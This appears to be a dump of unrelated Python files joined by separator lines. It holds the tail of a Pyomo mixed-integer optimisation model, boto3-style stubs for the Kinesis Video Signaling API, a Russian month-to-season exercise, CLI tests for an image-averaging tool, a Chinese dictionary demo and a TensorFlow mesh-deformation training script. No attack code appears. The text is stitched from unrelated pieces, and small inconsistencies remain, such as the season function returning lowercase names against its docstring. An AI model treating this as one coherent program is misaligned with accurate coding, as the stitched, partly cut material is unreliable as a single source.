+ 834.258761011951*m.b159 + 836.015790081594*m.b160 + 333.50853775*m.b161
+ 114.488510347914*m.b162 + 71.1466014342705*m.b163 + 327.61554475*m.b164
+ 115.456652447649*m.b165 + 72.6961052063678*m.b166 + 418.975572*m.b167
+ 144.050104531568*m.b168 + 89.5861361571157*m.b169 + 441.6481805*m.b170
+ 147.751509681552*m.b171 + 90.6409148587658*m.b172 + 284.85345325*m.b173
+ 109.929987849219*m.b174 + 72.4317650925971*m.b175 + 364.98681475*m.b176
+ 131.410153066893*m.b177 + 83.6314997177532*m.b178 + 261.83219775*m.b179
+ 103.183186592188*m.b180 + 68.7017117455899*m.b181 + 481.55377575*m.b182
+ 144.356933487536*m.b183 + 83.8297118343163*m.b184 + 88728.6114762329*m.x185
+ 88728.6114762329*m.x186 + 88728.6114762329*m.x187 + 88728.6114762329*m.x188
+ 88728.6114762329*m.x189 + 88728.6114762329*m.x190 + 88728.6114762329*m.x191
+ 88728.6114762329*m.x192, sense=minimize)
m.c2 = Constraint(expr= 0.818476132*m.b1 + 0.870157536*m.b9 + 1.031851452*m.b17 + 0.557538685*m.b25
+ 0.547431463*m.b33 + 0.875695399*m.b41 + 1.084580786*m.b49 + 0.730328391*m.b57
+ 0.942474488*m.b65 + 1.428565416*m.b73 + 0.86023025*m.b81 + 1.427064072*m.b89
+ 1.077855852*m.b97 + 0.966432495*m.b105 + 0.749586417*m.b113 + 1.20475136*m.b121
+ 0.637168473*m.b129 + 0.637828387*m.b137 + 0.578555855*m.b145 + 1.377981994*m.b153
- 1.68639324125*m.x193 - 3.3727864825*m.x194 - 5.05917972375*m.x195 == 0)
m.c3 = Constraint(expr= 0.818476132*m.b2 + 0.870157536*m.b10 + 1.031851452*m.b18 + 0.557538685*m.b26
+ 0.547431463*m.b34 + 0.875695399*m.b42 + 1.084580786*m.b50 + 0.730328391*m.b58
+ 0.942474488*m.b66 + 1.428565416*m.b74 + 0.86023025*m.b82 + 1.427064072*m.b90
+ 1.077855852*m.b98 + 0.966432495*m.b106 + 0.749586417*m.b114 + 1.20475136*m.b122
+ 0.637168473*m.b130 + 0.637828387*m.b138 + 0.578555855*m.b146 + 1.377981994*m.b154
- 1.792318871875*m.x196 - 3.58463774375*m.x197 - 5.376956615625*m.x198 == 0)
m.c4 = Constraint(expr= 0.818476132*m.b3 + 0.870157536*m.b11 + 1.031851452*m.b19 + 0.557538685*m.b27
+ 0.547431463*m.b35 + 0.875695399*m.b43 + 1.084580786*m.b51 + 0.730328391*m.b59
+ 0.942474488*m.b67 + 1.428565416*m.b75 + 0.86023025*m.b83 + 1.427064072*m.b91
+ 1.077855852*m.b99 + 0.966432495*m.b107 + 0.749586417*m.b115 + 1.20475136*m.b123
+ 0.637168473*m.b131 + 0.637828387*m.b139 + 0.578555855*m.b147 + 1.377981994*m.b155
- 2.128386030625*m.x199 - 4.25677206125*m.x200 - 6.385158091875*m.x201 == 0)
m.c5 = Constraint(expr= 0.818476132*m.b4 + 0.870157536*m.b12 + 1.031851452*m.b20 + 0.557538685*m.b28
+ 0.547431463*m.b36 + 0.875695399*m.b44 + 1.084580786*m.b52 + 0.730328391*m.b60
+ 0.942474488*m.b68 + 1.428565416*m.b76 + 0.86023025*m.b84 + 1.427064072*m.b92
+ 1.077855852*m.b100 + 0.966432495*m.b108 + 0.749586417*m.b116 + 1.20475136*m.b124
+ 0.637168473*m.b132 + 0.637828387*m.b140 + 0.578555855*m.b148 + 1.377981994*m.b156
- 2.066948260625*m.x202 - 4.13389652125*m.x203 - 6.200844781875*m.x204 == 0)
m.c6 = Constraint(expr= 0.818476132*m.b5 + 0.870157536*m.b13 + 1.031851452*m.b21 + 0.557538685*m.b29
+ 0.547431463*m.b37 + 0.875695399*m.b45 + 1.084580786*m.b53 + 0.730328391*m.b61
+ 0.942474488*m.b69 + 1.428565416*m.b77 + 0.86023025*m.b85 + 1.427064072*m.b93
+ 1.077855852*m.b101 + 0.966432495*m.b109 + 0.749586417*m.b117 + 1.20475136*m.b125
+ 0.637168473*m.b133 + 0.637828387*m.b141 + 0.578555855*m.b149 + 1.377981994*m.b157
- 2.04641702*m.x205 - 4.09283404*m.x206 - 6.13925106*m.x207 == 0)
m.c7 = Constraint(expr= 0.818476132*m.b6 + 0.870157536*m.b14 + 1.031851452*m.b22 + 0.557538685*m.b30
+ 0.547431463*m.b38 + 0.875695399*m.b46 + 1.084580786*m.b54 + 0.730328391*m.b62
+ 0.942474488*m.b70 + 1.428565416*m.b78 + 0.86023025*m.b86 + 1.427064072*m.b94
+ 1.077855852*m.b102 + 0.966432495*m.b110 + 0.749586417*m.b118 + 1.20475136*m.b126
+ 0.637168473*m.b134 + 0.637828387*m.b142 + 0.578555855*m.b150 + 1.377981994*m.b158
- 2.129217781875*m.x208 - 4.25843556375*m.x209 - 6.387653345625*m.x210 == 0)
m.c8 = Constraint(expr= 0.818476132*m.b7 + 0.870157536*m.b15 + 1.031851452*m.b23 + 0.557538685*m.b31
+ 0.547431463*m.b39 + 0.875695399*m.b47 + 1.084580786*m.b55 + 0.730328391*m.b63
+ 0.942474488*m.b71 + 1.428565416*m.b79 + 0.86023025*m.b87 + 1.427064072*m.b95
+ 1.077855852*m.b103 + 0.966432495*m.b111 + 0.749586417*m.b119 + 1.20475136*m.b127
+ 0.637168473*m.b135 + 0.637828387*m.b143 + 0.578555855*m.b151 + 1.377981994*m.b159
- 2.002947450625*m.x211 - 4.00589490125*m.x212 - 6.008842351875*m.x213 == 0)
m.c9 = Constraint(expr= 0.818476132*m.b8 + 0.870157536*m.b16 + 1.031851452*m.b24 + 0.557538685*m.b32
+ 0.547431463*m.b40 + 0.875695399*m.b48 + 1.084580786*m.b56 + 0.730328391*m.b64
+ 0.942474488*m.b72 + 1.428565416*m.b80 + 0.86023025*m.b88 + 1.427064072*m.b96
+ 1.077855852*m.b104 + 0.966432495*m.b112 + 0.749586417*m.b120 + 1.20475136*m.b128
+ 0.637168473*m.b136 + 0.637828387*m.b144 + 0.578555855*m.b152 + 1.377981994*m.b160
- 1.62146898*m.x214 - 3.24293796*m.x215 - 4.86440694*m.x216 == 0)
m.c10 = Constraint(expr= m.b1 + m.b2 + m.b3 + m.b4 + m.b5 + m.b6 + m.b7 + m.b8 == 1)
m.c11 = Constraint(expr= m.b9 + m.b10 + m.b11 + m.b12 + m.b13 + m.b14 + m.b15 + m.b16 == 1)
m.c12 = Constraint(expr= m.b17 + m.b18 + m.b19 + m.b20 + m.b21 + m.b22 + m.b23 + m.b24 == 1)
m.c13 = Constraint(expr= m.b25 + m.b26 + m.b27 + m.b28 + m.b29 + m.b30 + m.b31 + m.b32 == 1)
m.c14 = Constraint(expr= m.b33 + m.b34 + m.b35 + m.b36 + m.b37 + m.b38 + m.b39 + m.b40 == 1)
m.c15 = Constraint(expr= m.b41 + m.b42 + m.b43 + m.b44 + m.b45 + m.b46 + m.b47 + m.b48 == 1)
m.c16 = Constraint(expr= m.b49 + m.b50 + m.b51 + m.b52 + m.b53 + m.b54 + m.b55 + m.b56 == 1)
m.c17 = Constraint(expr= m.b57 + m.b58 + m.b59 + m.b60 + m.b61 + m.b62 + m.b63 + m.b64 == 1)
m.c18 = Constraint(expr= m.b65 + m.b66 + m.b67 + m.b68 + m.b69 + m.b70 + m.b71 + m.b72 == 1)
m.c19 = Constraint(expr= m.b73 + m.b74 + m.b75 + m.b76 + m.b77 + m.b78 + m.b79 + m.b80 == 1)
m.c20 = Constraint(expr= m.b81 + m.b82 + m.b83 + m.b84 + m.b85 + m.b86 + m.b87 + m.b88 == 1)
m.c21 = Constraint(expr= m.b89 + m.b90 + m.b91 + m.b92 + m.b93 + m.b94 + m.b95 + m.b96 == 1)
m.c22 = Constraint(expr= m.b97 + m.b98 + m.b99 + m.b100 + m.b101 + m.b102 + m.b103 + m.b104 == 1)
m.c23 = Constraint(expr= m.b105 + m.b106 + m.b107 + m.b108 + m.b109 + m.b110 + m.b111 + m.b112 == 1)
m.c24 = Constraint(expr= m.b113 + m.b114 + m.b115 + m.b116 + m.b117 + m.b118 + m.b119 + m.b120 == 1)
m.c25 = Constraint(expr= m.b121 + m.b122 + m.b123 + m.b124 + m.b125 + m.b126 + m.b127 + m.b128 == 1)
m.c26 = Constraint(expr= m.b129 + m.b130 + m.b131 + m.b132 + m.b133 + m.b134 + m.b135 + m.b136 == 1)
m.c27 = Constraint(expr= m.b137 + m.b138 + m.b139 + m.b140 + m.b141 + m.b142 + m.b143 + m.b144 == 1)
m.c28 = Constraint(expr= m.b145 + m.b146 + m.b147 + m.b148 + m.b149 + m.b150 + m.b151 + m.b152 == 1)
m.c29 = Constraint(expr= m.b153 + m.b154 + m.b155 + m.b156 + m.b157 + m.b158 + m.b159 + m.b160 == 1)
m.c30 = Constraint(expr= m.b161 + m.b162 + m.b163 <= 1)
m.c31 = Constraint(expr= m.b164 + m.b165 + m.b166 <= 1)
m.c32 = Constraint(expr= m.b167 + m.b168 + m.b169 <= 1)
m.c33 = Constraint(expr= m.b170 + m.b171 + m.b172 <= 1)
m.c34 = Constraint(expr= m.b173 + m.b174 + m.b175 <= 1)
m.c35 = Constraint(expr= m.b176 + m.b177 + m.b178 <= 1)
m.c36 = Constraint(expr= m.b179 + m.b180 + m.b181 <= 1)
m.c37 = Constraint(expr= m.b182 + m.b183 + m.b184 <= 1)
m.c38 = Constraint(expr= - m.b161 + m.x193 <= 0)
m.c39 = Constraint(expr= - m.b162 + m.x194 <= 0)
m.c40 = Constraint(expr= - m.b163 + m.x195 <= 0)
m.c41 = Constraint(expr= - m.b164 + m.x196 <= 0)
m.c42 = Constraint(expr= - m.b165 + m.x197 <= 0)
m.c43 = Constraint(expr= - m.b166 + m.x198 <= 0)
m.c44 = Constraint(expr= - m.b167 + m.x199 <= 0)
m.c45 = Constraint(expr= - m.b168 + m.x200 <= 0)
m.c46 = Constraint(expr= - m.b169 + m.x201 <= 0)
m.c47 = Constraint(expr= - m.b170 + m.x202 <= 0)
m.c48 = Constraint(expr= - m.b171 + m.x203 <= 0)
m.c49 = Constraint(expr= - m.b172 + m.x204 <= 0)
m.c50 = Constraint(expr= - m.b173 + m.x205 <= 0)
m.c51 = Constraint(expr= - m.b174 + m.x206 <= 0)
m.c52 = Constraint(expr= - m.b175 + m.x207 <= 0)
m.c53 = Constraint(expr= - m.b176 + m.x208 <= 0)
m.c54 = Constraint(expr= - m.b177 + m.x209 <= 0)
m.c55 = Constraint(expr= - m.b178 + m.x210 <= 0)
m.c56 = Constraint(expr= - m.b179 + m.x211 <= 0)
m.c57 = Constraint(expr= - m.b180 + m.x212 <= 0)
m.c58 = Constraint(expr= - m.b181 + m.x213 <= 0)
m.c59 = Constraint(expr= - m.b182 + m.x214 <= 0)
m.c60 = Constraint(expr= - m.b183 + m.x215 <= 0)
m.c61 = Constraint(expr= - m.b184 + m.x216 <= 0)
m.c62 = Constraint(expr=-m.x185/(1 + m.x185) + m.x193 <= 0)
m.c63 = Constraint(expr=-m.x185/(1 + m.x185) + m.x194 <= 0)
m.c64 = Constraint(expr=-m.x185/(1 + m.x185) + m.x195 <= 0)
m.c65 = Constraint(expr=-m.x186/(1 + m.x186) + m.x196 <= 0)
m.c66 = Constraint(expr=-m.x186/(1 + m.x186) + m.x197 <= 0)
m.c67 = Constraint(expr=-m.x186/(1 + m.x186) + m.x198 <= 0)
m.c68 = Constraint(expr=-m.x187/(1 + m.x187) + m.x199 <= 0)
m.c69 = Constraint(expr=-m.x187/(1 + m.x187) + m.x200 <= 0)
m.c70 = Constraint(expr=-m.x187/(1 + m.x187) + m.x201 <= 0)
m.c71 = Constraint(expr=-m.x188/(1 + m.x188) + m.x202 <= 0)
m.c72 = Constraint(expr=-m.x188/(1 + m.x188) + m.x203 <= 0)
m.c73 = Constraint(expr=-m.x188/(1 + m.x188) + m.x204 <= 0)
m.c74 = Constraint(expr=-m.x189/(1 + m.x189) + m.x205 <= 0)
m.c75 = Constraint(expr=-m.x189/(1 + m.x189) + m.x206 <= 0)
m.c76 = Constraint(expr=-m.x189/(1 + m.x189) + m.x207 <= 0)
m.c77 = Constraint(expr=-m.x190/(1 + m.x190) + m.x208 <= 0)
m.c78 = Constraint(expr=-m.x190/(1 + m.x190) + m.x209 <= 0)
m.c79 = Constraint(expr=-m.x190/(1 + m.x190) + m.x210 <= 0)
m.c80 = Constraint(expr=-m.x191/(1 + m.x191) + m.x211 <= 0)
m.c81 = Constraint(expr=-m.x191/(1 + m.x191) + m.x212 <= 0)
m.c82 = Constraint(expr=-m.x191/(1 + m.x191) + m.x213 <= 0)
m.c83 = Constraint(expr=-m.x192/(1 + m.x192) + m.x214 <= 0)
m.c84 = Constraint(expr=-m.x192/(1 + m.x192) + m.x215 <= 0)
m.c85 = Constraint(expr=-m.x192/(1 + m.x192) + m.x216 <= 0)
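# --- Usage sketch --------------------------------------------------------------
# A minimal sketch of solving this MINLP, assuming a suitable MINLP solver such
# as Bonmin or Couenne is installed and on the PATH; the solver name below is an
# assumption, not prescribed by this file.
#
#   opt = SolverFactory('bonmin')
#   results = opt.solve(m, tee=True)
#   print(value(m.obj))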
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_ice_server_config(ChannelARN=None, ClientId=None, Service=None, Username=None):
"""
    Gets the Interactive Connectivity Establishment (ICE) server configuration information, including URIs, username, and password which can be used to configure the WebRTC connection. The ICE component uses this configuration information to set up the WebRTC connection, including authenticating with the Traversal Using Relays around NAT (TURN) relay server.
TURN is a protocol that is used to improve the connectivity of peer-to-peer applications. By providing a cloud-based relay service, TURN ensures that a connection can be established even when one or more peers are incapable of a direct peer-to-peer connection. For more information, see A REST API For Access To TURN Services .
You can invoke this API to establish a fallback mechanism in case either of the peers is unable to establish a direct peer-to-peer connection over a signaling channel. You must specify either a signaling channel ARN or the client ID in order to invoke this API.
See also: AWS API Documentation
Exceptions
:example: response = client.get_ice_server_config(
ChannelARN='string',
ClientId='string',
Service='TURN',
Username='string'
)
:type ChannelARN: string
:param ChannelARN: [REQUIRED]\nThe ARN of the signaling channel to be used for the peer-to-peer connection between configured peers.\n
:type ClientId: string
:param ClientId: Unique identifier for the viewer. Must be unique within the signaling channel.
:type Service: string
:param Service: Specifies the desired service. Currently, TURN is the only valid value.
:type Username: string
:param Username: An optional user ID to be associated with the credentials.
:rtype: dict
ReturnsResponse Syntax
{
'IceServerList': [
{
'Uris': [
'string',
],
'Username': 'string',
'Password': 'string',
'Ttl': 123
},
]
}
Response Structure
(dict) --
IceServerList (list) --
The list of ICE server information objects.
(dict) --
A structure for the ICE server connection data.
Uris (list) --
An array of URIs, in the form specified in the I-D.petithuguenin-behave-turn-uris spec. These URIs provide the different addresses and/or protocols that can be used to reach the TURN server.
(string) --
Username (string) --
A username to login to the ICE server.
Password (string) --
A password to login to the ICE server.
Ttl (integer) --
The period of time, in seconds, during which the username and password are valid.
Exceptions
KinesisVideoSignalingChannels.Client.exceptions.InvalidClientException
KinesisVideoSignalingChannels.Client.exceptions.SessionExpiredException
KinesisVideoSignalingChannels.Client.exceptions.ClientLimitExceededException
KinesisVideoSignalingChannels.Client.exceptions.ResourceNotFoundException
KinesisVideoSignalingChannels.Client.exceptions.InvalidArgumentException
KinesisVideoSignalingChannels.Client.exceptions.NotAuthorizedException
:return: {
'IceServerList': [
{
'Uris': [
'string',
],
'Username': 'string',
'Password': 'string',
'Ttl': 123
},
]
}
:returns:
(string) --
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
ReturnsA paginator object.
"""
pass
def get_waiter(waiter_name=None):
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters\nsection of the service docs for a list of available waiters.
:rtype: botocore.waiter.Waiter
"""
pass
def send_alexa_offer_to_master(ChannelARN=None, SenderClientId=None, MessagePayload=None):
"""
This API allows you to connect WebRTC-enabled devices with Alexa display devices. When invoked, it sends the Alexa Session Description Protocol (SDP) offer to the master peer. The offer is delivered as soon as the master is connected to the specified signaling channel. This API returns the SDP answer from the connected master. If the master is not connected to the signaling channel, redelivery requests are made until the message expires.
See also: AWS API Documentation
Exceptions
:example: response = client.send_alexa_offer_to_master(
ChannelARN='string',
SenderClientId='string',
MessagePayload='string'
)
:type ChannelARN: string
:param ChannelARN: [REQUIRED]\nThe ARN of the signaling channel by which Alexa and the master peer communicate.\n
:type SenderClientId: string
:param SenderClientId: [REQUIRED]\nThe unique identifier for the sender client.\n
:type MessagePayload: string
:param MessagePayload: [REQUIRED]\nThe base64-encoded SDP offer content.\n
:rtype: dict
ReturnsResponse Syntax
{
'Answer': 'string'
}
Response Structure
(dict) --
Answer (string) --
The base64-encoded SDP answer content.
Exceptions
KinesisVideoSignalingChannels.Client.exceptions.ClientLimitExceededException
KinesisVideoSignalingChannels.Client.exceptions.ResourceNotFoundException
KinesisVideoSignalingChannels.Client.exceptions.InvalidArgumentException
KinesisVideoSignalingChannels.Client.exceptions.NotAuthorizedException
:return: {
'Answer': 'string'
}
:returns:
KinesisVideoSignalingChannels.Client.exceptions.ClientLimitExceededException
KinesisVideoSignalingChannels.Client.exceptions.ResourceNotFoundException
KinesisVideoSignalingChannels.Client.exceptions.InvalidArgumentException
KinesisVideoSignalingChannels.Client.exceptions.NotAuthorizedException
"""
pass
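# --- Usage sketch --------------------------------------------------------------
# These stubs mirror the boto3 KinesisVideoSignalingChannels client. A minimal,
# hypothetical call via boto3 itself (the channel ARN below is a placeholder):
#
#   import boto3
#   client = boto3.client('kinesis-video-signaling')
#   response = client.get_ice_server_config(
#       ChannelARN='arn:aws:kinesisvideo:us-west-2:123456789012:channel/example/1234567890',
#       Service='TURN',
#   )
#   for server in response['IceServerList']:
#       print(server['Uris'], server['Ttl'])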
|
"""
Написать функцию month_to_season(), которая принимает 1 аргумент - номер месяца - и возвращает название сезона,
к которому относится этот месяц. Например, передаем 2, на выходе получаем "Winter".
"""
def month_to_season(month):
seasons = {
"winter": [1, 2, 12],
"spring": [3, 4, 5],
"summer": [6, 7, 8],
"autumn": [9, 10, 11],
}
for season, months in seasons.items():
if month in months:
return season
print(month_to_season(2))
|
import os
import sys
import tempfile
from pathlib import Path
from subprocess import Popen, PIPE
from average_pixels.version import __version__
# Extract it from setup.py?
TOOL = 'average-pixels'
IMAGES_DIR = 'images'
def run_tool(args):
p = Popen(args, stdout=PIPE, stderr=PIPE)
stdout, stderr = (out.decode('utf-8') for out in p.communicate())
return p, stdout, stderr
def get_images_dir():
return str(Path(sys.path[0]).parent / IMAGES_DIR)
def test_fails_with_help_no_args():
p, stdout, stderr = run_tool(TOOL)
assert p.returncode == 2
assert 'usage:' in stderr.lower()
def test_fails_with_help_when_running_mode_no_args():
for mode in ['download', 'local']:
p, stdout, stderr = run_tool([TOOL, mode])
assert p.returncode == 2
assert 'usage:' in stderr.lower()
def test_fails_when_dir_inexistent():
    # mkdtemp (unlike TemporaryDirectory) has no finalizer that would fail
    # after the directory is removed by hand
    path = tempfile.mkdtemp()
    os.rmdir(path)  # the path now refers to a directory that no longer exists
    p, stdout, stderr = run_tool([TOOL, 'local', path])
    assert p.returncode == 1
    assert 'not found' in stderr.lower()
def test_fails_when_dir_has_no_images():
    path = tempfile.mkdtemp()
    p, stdout, stderr = run_tool([TOOL, 'local', path])
    assert p.returncode == 1
    assert 'no images' in stderr.lower()
    os.rmdir(path)
def test_fails_when_dir_is_a_file():
    fd, path = tempfile.mkstemp()
    os.close(fd)  # only the path is needed; the tool should reject a plain file
    p, stdout, stderr = run_tool([TOOL, 'local', path])
    assert p.returncode == 1
    assert 'not a directory' in stderr.lower()
    os.unlink(path)
def test_version_displays_correctly():
p, stdout, stderr = run_tool([TOOL, '--version'])
assert p.returncode == 0
assert __version__ in stdout
def test_output_filename_ignores_user_extension():
p, stdout, stderr = run_tool(
[TOOL, 'local', get_images_dir(), '--output', 'filename.ext'])
assert 'ext' not in stdout
def test_output_filename_adds_jpg():
p, stdout, stderr = run_tool(
[TOOL, 'local', get_images_dir(), '--output', 'filename.ext'])
assert 'jpg' in stdout
|
"""
Python 字典测试
"""
dict = {'name':'goujinping','age':'21','sex':'man','school':'NEFU'}
print(dict)
print(dict['age']) #通过键访问相应的值
print(dict['name'])
for key in dict.keys(): #访问字典的键 dict2.keys(),返回一个列表
print(key)
for value in dict.values(): #访问字典的值 dict2.values(), 返回一个列表
print(value)
del dict['sex'] #删除字典元素和字典
print(dict)
del dict
print(dict)
|
#Copyright (C) 2021 Fanwei Kong, Shawn C. Shadden, University of California, Berkeley
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "src"))
import glob
import functools
import pickle
import argparse
import numpy as np
from sklearn.model_selection import train_test_split
import tensorflow as tf
from tensorflow.python.keras.optimizers import Adam, SGD
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import losses
from tensorflow.python.keras import models
from tensorflow.python.keras.utils import multi_gpu_model
from utils import buildImageDataset, construct_feed_dict
from custom_layers import *
from augmentation import change_intensity_img, _augment_deformnet
from dataset import get_baseline_dataset, get_baseline_dataset_deformnet
from model import DeformNet
from loss import mesh_loss_geometric_cf, point_loss_cf, binary_bce_dice_loss
from call_backs import *
"""# Set up"""
parser = argparse.ArgumentParser()
parser.add_argument('--im_trains', nargs='+',help='Name of the folder containing the image data')
parser.add_argument('--im_vals', nargs='+', help='Name of the folder containing the image data')
parser.add_argument('--pre_train', default='', help="Filename of the pretrained graph model")
parser.add_argument('--mesh', help='Name of the .dat file containing mesh info')
parser.add_argument('--mesh_txt', nargs='+', help='Name of the mesh_info.txt file with tmplt scale and center into')
parser.add_argument('--output', help='Name of the output folder')
parser.add_argument('--attr_trains', nargs='+', help='Attribute name of the folders containing tf records')
parser.add_argument('--attr_vals', nargs='+', help='Attribute name of the folders containing tf records')
parser.add_argument('--train_data_weights', type=float, nargs='+', help='Weights to apply for the samples in different datasets')
parser.add_argument('--val_data_weights', type=float, nargs='+', help='Weights to apply for the samples in different datasets')
parser.add_argument('--file_pattern', default='*.tfrecords', help='Pattern of the .tfrecords files')
parser.add_argument('--modality', nargs='+', help='Name of the modality, mr, ct, split by space')
parser.add_argument('--num_epoch', type=int, help='Maximum number of epochs to run')
parser.add_argument('--num_seg', type=int,default=1, help='Number of segmentation classes')
parser.add_argument('--seg_weight', type=float, default=1., help='Weight of the segmentation loss')
parser.add_argument('--mesh_ids', nargs='+', type=int, default=[2], help='Number of meshes to train')
parser.add_argument('--batch_size', type=int, default=10, help='Batch size')
parser.add_argument('--shuffle_buffer_size', type=int, default=10000, help='Shuffle buffer size')
parser.add_argument('--lr', type=float, help='Learning rate')
parser.add_argument('--cf_ratio', type=float, default=1., help='Loss ratio between gt chamfer loss and pred chamfer loss')
parser.add_argument('--size', type = int, nargs='+', help='Image dimensions')
parser.add_argument('--weights', type = float, nargs='+', help='Loss weights for geometric loss')
parser.add_argument('--hidden_dim', type = int, default=128, help='Hidden dimension')
parser.add_argument('--amplify_factor', type=float, default=1., help="amplify_factor of the predicted displacements")
args = parser.parse_args()
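# --- Example invocation (illustrative only; the script name, paths and values
# --- below are assumptions, not prescribed anywhere in this file) --------------
#   python train.py \
#       --im_trains /data/tfrecords_train --im_vals /data/tfrecords_val \
#       --attr_trains '' --attr_vals '' \
#       --train_data_weights 1.0 --val_data_weights 1.0 \
#       --mesh templates/mesh_info.dat --mesh_txt templates/mesh_info.txt \
#       --modality ct --mesh_ids 2 --num_epoch 300 --lr 0.001 \
#       --size 128 128 128 --weights 0.3 0.46 0.16 0.08 \
#       --batch_size 1 --output ./output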
img_shape = (args.size[0], args.size[1], args.size[2], 1)
save_loss_path = args.output
save_model_path = os.path.join(args.output, "weights_gcn.hdf5")
""" Create new directories """
try:
os.makedirs(os.path.dirname(save_model_path))
os.makedirs(os.path.dirname(save_loss_path))
except Exception as e:
    print(e)
"""# Feed in mesh info"""
pkl = pickle.load(open(args.mesh, 'rb'))
mesh_info = construct_feed_dict(pkl)
mesh_info['mesh_center'] = [np.zeros(3) for i in range(len(args.mesh_ids))]
mesh_info['mesh_scale'] = [0 for i in range(len(args.mesh_ids))]
mesh_info['mesh_area'] = [0 for i in range(len(args.mesh_ids))]
mesh_info['edge_length_scaled'] = [np.zeros(3) for i in range(len(args.mesh_ids))] # 3 is number of blocks
for txt_fn in args.mesh_txt:
for i in range(len(args.mesh_ids)):
ctr_scale = np.loadtxt(txt_fn)
if len(ctr_scale.shape)==1:
ctr_scale = np.expand_dims(ctr_scale, axis=0)
mesh_info['mesh_center'][i] += ctr_scale[i, :-2]/len(args.modality)
mesh_info['mesh_scale'][i] += ctr_scale[i, -2]/len(args.modality)
mesh_info['mesh_area'][i] += ctr_scale[i, -1]/len(args.modality)
for i in range(len(args.mesh_ids)):
r = mesh_info['mesh_scale'][i]*2
scale = r * np.mean(args.size)
area_ratio = mesh_info['mesh_area'][i]/(4*np.pi*r*r)
mesh_info['edge_length_scaled'][i] = np.array(mesh_info['edge_length']) * scale * scale * area_ratio
print("Mesh center, scale: ", mesh_info['mesh_center'], mesh_info['mesh_scale'])
print("Mesh edge: ", mesh_info['edge_length_scaled'])
"""## Set up train and validation datasets
Note that we apply image augmentation to our training dataset but not our validation dataset.
"""
tr_cfg = {'change_intensity': {"scale": [0.9, 1.1],"shift": [-0.1, 0.1]}}
tr_preprocessing_fn = functools.partial(_augment_deformnet, **tr_cfg)
if_seg = True if args.num_seg>0 else False
val_preprocessing_fn = functools.partial(_augment_deformnet)
train_ds_list, val_ds_list = [], []
train_ds_num, val_ds_num = [], []
for data_folder_out, attr in zip(args.im_trains, args.attr_trains):
x_train_filenames_i = buildImageDataset(data_folder_out, args.modality, 41, mode='_train'+attr, ext=args.file_pattern)
train_ds_num.append(len(x_train_filenames_i))
train_ds_i = get_baseline_dataset_deformnet(x_train_filenames_i, preproc_fn=tr_preprocessing_fn, mesh_ids=args.mesh_ids, \
shuffle_buffer=args.shuffle_buffer_size, if_seg=if_seg)
train_ds_list.append(train_ds_i)
for data_val_folder_out, attr in zip(args.im_vals, args.attr_vals):
x_val_filenames_i = buildImageDataset(data_val_folder_out, args.modality, 41, mode='_val'+attr, ext=args.file_pattern)
val_ds_num.append(len(x_val_filenames_i))
val_ds_i = get_baseline_dataset_deformnet(x_val_filenames_i, preproc_fn=val_preprocessing_fn, mesh_ids=args.mesh_ids, \
shuffle_buffer=args.shuffle_buffer_size, if_seg=if_seg)
val_ds_list.append(val_ds_i)
train_data_weights = [w/np.sum(args.train_data_weights) for w in args.train_data_weights]
val_data_weights = [w/np.sum(args.val_data_weights) for w in args.val_data_weights]
print("Sampling probability for train and val datasets: ", train_data_weights, val_data_weights)
train_ds = tf.data.experimental.sample_from_datasets(train_ds_list, weights=train_data_weights)
train_ds = train_ds.batch(args.batch_size)
val_ds = tf.data.experimental.sample_from_datasets(val_ds_list, weights=val_data_weights)
val_ds = val_ds.batch(args.batch_size)
num_train_examples = train_ds_num[np.argmax(train_data_weights)]/np.max(train_data_weights)
num_val_examples = val_ds_num[np.argmax(val_data_weights)]/np.max(val_data_weights)
print("Number of train, val samples after reweighting: ", num_train_examples, num_val_examples)
"""# Build the model"""
model = DeformNet(args.batch_size, img_shape, mesh_info, amplify_factor=args.amplify_factor,num_mesh=len(args.mesh_ids), num_seg=args.num_seg)
unet_gcn = model.build_keras()
unet_gcn.summary(line_length=150)
